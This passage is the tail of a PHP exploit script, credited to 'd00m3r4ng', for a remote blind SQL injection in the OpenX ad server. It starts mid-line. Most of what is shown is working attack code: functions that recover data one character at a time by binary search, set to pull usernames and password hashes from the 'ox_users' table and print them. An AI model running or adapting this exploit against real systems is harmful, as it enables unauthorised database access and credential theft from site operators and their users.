",0)) $i++;
return $i;
}
function getValue($length){
for ($a=1;$a<$length;$a++){
$bl=45; $bh=123;
while(!sockr($a,"=",$b=intval(($bl+$bh)/2)))
if (sockr($a,">",$b)) $bl=$b;
else $bh=$b;
$v.=chr($b);}
return $v; }
$host="127.0.0.1";
$result="concat(username,0x3A,password)";
$table="ox_users";
if(isset($_POST['host'])){
extract($_POST);
$l=0;
while(sockr(1,">",0)) $l++;
$f=$l;
for ($l=0;$l<$f;$l++)
if ($length=getLength()) echo "VALUE: ".getValue($length)."
"; }
?>
OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
Vuln discovered and Exploit coded by d00m3r4ng
Contact: d00m3r4ng[at]gmail.com